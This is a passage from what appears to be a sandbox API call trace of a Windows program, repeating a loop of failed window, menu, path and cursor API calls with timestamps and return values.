(lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.103] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.103] GetMenu (hWnd=0x0) returned 0x0 [0176.103] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x352) returned -1 [0176.103] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.103] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.103] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.103] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.103] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.103] GetStockObject (i=6) returned 0x1b00018 [0176.103] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.103] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.103] PathFileExistsW (pszPath=0x0) returned 0 [0176.103] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.103] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.104] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.104] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.104] GetMenu (hWnd=0x0) returned 0x0 [0176.104] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x34f) returned -1 [0176.104] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.104] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.104] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.104] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.104] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.104] GetStockObject (i=6) returned 0x1b00018 [0176.104] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.104] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.104] PathFileExistsW (pszPath=0x0) returned 0 [0176.104] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.104] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.104] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.104] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.104] GetMenu (hWnd=0x0) returned 0x0 [0176.104] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x177) returned -1 [0176.104] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.104] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.104] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.104] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.104] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.104] GetStockObject (i=6) returned 0x1b00018 [0176.104] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.104] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.104] PathFileExistsW (pszPath=0x0) returned 0 [0176.104] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.104] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.104] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.104] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.104] GetMenu (hWnd=0x0) returned 0x0 [0176.104] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x352) returned -1 [0176.105] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.105] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.105] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.105] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.105] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.105] GetStockObject (i=6) returned 0x1b00018 [0176.105] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.105] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.105] PathFileExistsW (pszPath=0x0) returned 0 [0176.105] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.105] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.105] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.105] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.105] GetMenu (hWnd=0x0) returned 0x0 [0176.105] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x353) returned -1 [0176.105] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.105] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.105] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.105] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.105] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.105] GetStockObject (i=6) returned 0x1b00018 [0176.105] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.105] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.105] PathFileExistsW (pszPath=0x0) returned 0 [0176.105] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.105] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.105] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.105] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.105] GetMenu (hWnd=0x0) returned 0x0 [0176.105] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x352) returned -1 [0176.105] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.105] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.105] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.105] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.105] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.106] GetStockObject (i=6) returned 0x1b00018 [0176.106] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.106] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.106] PathFileExistsW (pszPath=0x0) returned 0 [0176.106] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.106] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.106] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.106] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.106] GetMenu (hWnd=0x0) returned 0x0 [0176.106] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x355) returned -1 [0176.106] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.106] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.106] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.106] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.106] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.106] GetStockObject (i=6) returned 0x1b00018 [0176.106] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.106] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.106] PathFileExistsW (pszPath=0x0) returned 0 [0176.106] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.106] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.106] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.106] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.106] GetMenu (hWnd=0x0) returned 0x0 [0176.106] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x4bc) returned -1 [0176.106] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.106] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.106] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.106] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.106] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.106] GetStockObject (i=6) returned 0x1b00018 [0176.106] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.106] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.106] PathFileExistsW (pszPath=0x0) returned 0 [0176.107] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.107] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.107] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.107] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.107] GetMenu (hWnd=0x0) returned 0x0 [0176.107] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x352) returned -1 [0176.107] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.107] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.107] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.107] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.107] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.107] GetStockObject (i=6) returned 0x1b00018 [0176.107] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.107] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.107] PathFileExistsW (pszPath=0x0) returned 0 [0176.107] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.107] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.107] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.107] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.107] GetMenu (hWnd=0x0) returned 0x0 [0176.107] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x350) returned -1 [0176.107] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.107] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.107] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.107] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.107] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.107] GetStockObject (i=6) returned 0x1b00018 [0176.107] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.107] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.107] PathFileExistsW (pszPath=0x0) returned 0 [0176.107] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.107] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.107] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.107] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.107] GetMenu (hWnd=0x0) returned 0x0 [0176.108] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x352) returned -1 [0176.108] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.108] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.108] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.108] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.108] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.108] GetStockObject (i=6) returned 0x1b00018 [0176.108] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.108] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.108] PathFileExistsW (pszPath=0x0) returned 0 [0176.108] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.108] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.108] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.108] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.108] GetMenu (hWnd=0x0) returned 0x0 [0176.108] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x351) returned -1 [0176.108] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.108] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.108] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.108] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.108] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.108] GetStockObject (i=6) returned 0x1b00018 [0176.108] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.108] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.108] PathFileExistsW (pszPath=0x0) returned 0 [0176.108] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.108] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.108] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.108] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.108] GetMenu (hWnd=0x0) returned 0x0 [0176.108] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x306) returned -1 [0176.108] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.108] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.108] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.108] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.109] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.109] GetStockObject (i=6) returned 0x1b00018 [0176.109] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.109] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.109] PathFileExistsW (pszPath=0x0) returned 0 [0176.109] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.109] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.109] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.109] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.109] GetMenu (hWnd=0x0) returned 0x0 [0176.109] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x352) returned -1 [0176.109] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.109] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.109] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.109] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.109] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.109] GetStockObject (i=6) returned 0x1b00018 [0176.109] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.109] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.109] PathFileExistsW (pszPath=0x0) returned 0 [0176.109] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.109] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.109] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.109] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.109] GetMenu (hWnd=0x0) returned 0x0 [0176.109] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x354) returned -1 [0176.109] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.109] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.109] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.109] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.109] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.109] GetStockObject (i=6) returned 0x1b00018 [0176.109] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.109] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.110] PathFileExistsW (pszPath=0x0) returned 0 [0176.110] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.110] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.110] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.110] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.110] GetMenu (hWnd=0x0) returned 0x0 [0176.110] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x352) returned -1 [0176.110] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.110] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.110] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.110] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.110] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.110] GetStockObject (i=6) returned 0x1b00018 [0176.110] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.110] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.110] PathFileExistsW (pszPath=0x0) returned 0 [0176.110] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.110] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.110] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.110] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.110] GetMenu (hWnd=0x0) returned 0x0 [0176.110] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x350) returned -1 [0176.110] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.110] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.110] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.110] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.110] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.110] GetStockObject (i=6) returned 0x1b00018 [0176.110] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.110] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.110] PathFileExistsW (pszPath=0x0) returned 0 [0176.110] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.110] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.111] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.111] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.111] GetMenu (hWnd=0x0) returned 0x0 [0176.111] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x316) returned -1 [0176.111] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.111] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.111] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.111] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.111] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.111] GetStockObject (i=6) returned 0x1b00018 [0176.111] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.111] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.111] PathFileExistsW (pszPath=0x0) returned 0 [0176.111] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.111] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.111] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.111] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.111] GetMenu (hWnd=0x0) returned 0x0 [0176.111] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x352) returned -1 [0176.111] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.111] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.111] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.111] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.111] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.111] GetStockObject (i=6) returned 0x1b00018 [0176.111] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.111] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.111] PathFileExistsW (pszPath=0x0) returned 0 [0176.111] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.111] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.111] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.111] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.111] GetMenu (hWnd=0x0) returned 0x0 [0176.111] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x354) returned -1 [0176.111] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.112] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.112] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.112] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.112] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.112] GetStockObject (i=6) returned 0x1b00018 [0176.112] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.112] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.112] PathFileExistsW (pszPath=0x0) 